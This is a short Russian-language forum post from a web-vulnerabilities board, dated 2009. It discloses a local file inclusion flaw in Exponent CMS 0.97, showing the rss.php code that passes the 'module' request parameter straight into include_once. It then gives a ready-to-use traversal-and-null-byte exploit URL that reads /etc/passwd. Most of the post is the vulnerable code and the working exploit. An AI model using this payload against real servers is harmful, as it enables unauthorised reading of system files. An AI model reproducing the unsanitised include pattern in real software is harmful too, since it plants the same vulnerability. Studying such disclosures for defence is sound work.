Exponent CMS

Discussion in 'Веб-уязвимости' started by geezer.code, 29 Dec 2009.

  1. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    Version: 0.97
    LFI

    magic_quotes_gpc = Off или "особые обстоятельства"

    PHP:
    //file rss.php

    if (isset($_REQUEST['module'])) {
       
    $module $_REQUEST['module'];
    .....
    if (isset(
    $module)) {
        
    //get the RSS Items from the module  
        
    include_once('modules/'.$module.'/class.php');
    Exploit:
    Code:
    http://exponent/rss.php?module=../../../../etc/passwd%00
    
    зы насчет регстр глобалз я прогнал, это в другом месте.
     
    #1 geezer.code, 29 Dec 2009
    Last edited: 29 Dec 2009
    7 people like this.